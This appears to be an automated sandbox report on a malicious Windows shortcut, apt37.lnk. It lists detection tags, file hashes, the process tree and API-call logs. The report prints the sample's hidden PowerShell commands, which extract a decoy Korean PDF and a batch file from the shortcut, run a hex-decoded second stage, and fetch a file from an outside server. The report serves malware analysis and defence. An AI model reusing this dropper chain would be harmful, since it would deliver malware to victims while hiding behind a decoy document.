Summary | ZeroBOX

apt37.lnk

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P PDF Hide_URL DGA Http API FTP Socket Escalate privileges DNS Code injection Sniff Audio Steal credential GIF Format AntiDebug DLL AntiVM .NET DLL
Category Machine Started Completed
FILE s1_win7_x6402 May 25, 2023, 10:49 a.m. May 25, 2023, 10:51 a.m.
Size 22.4MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 7095811df4cb1ee4135ce605af7f163f
SHA256 4056772ab9ec106046cc2dfbeed71df92d629e5b612f12775f942c0d3255552d
CRC32 77EF5E16
ssdeep 24576:zKRluuFLcJLfnhWnLS98aLfKwNUXleXR9zYkh5kx94vyD223l9xU:GRdqG+iwgMYkMcyNc
Yara
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "bCPmm" C:\Users\test22\AppData\Local\Temp\apt37.lnk

    3008
    • cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;

      2216
      • powershell.exe powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;

        2260
        • AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"

          2656
        • cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\PMTRD.bat""

          376
          • cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$ts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rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

            2804
            • powershell.exe powershell -windowstyle hidden -command "$ts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rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

              1916

Name Response Post-Analysis Lookup
vmi810830.contaboserver.net 75.119.136.207
IP Address Status Action
164.124.101.2 Active Moloch
75.119.136.207 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ityProtocolType], 3072);
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000006b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b03e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006b0b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006afde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ff370
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006fffb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006ffcb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file c:\program files\mozilla firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://vmi810830.contaboserver.net/local/cache-js/f93754e660802d7cc70924cceb4738ef.gz
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73922000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf
file c:\Users\test22\AppData\Local\Temp\ojtnpej4.dll
file c:\Users\test22\AppData\Local\Temp\hawz4wth.dll
file c:\Users\test22\AppData\Local\Temp\8ax4pzbz.dll
file c:\Users\test22\AppData\Local\Temp\td2iyjiy.dll
file c:\Users\test22\AppData\Local\Temp\mimxjfes.dll
file c:\Users\test22\AppData\Local\Temp\v-jjopqs.dll
file c:\Users\test22\AppData\Local\Temp\pfywdxbj.dll
file C:\Users\test22\AppData\Local\Temp\PMTRD.bat
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
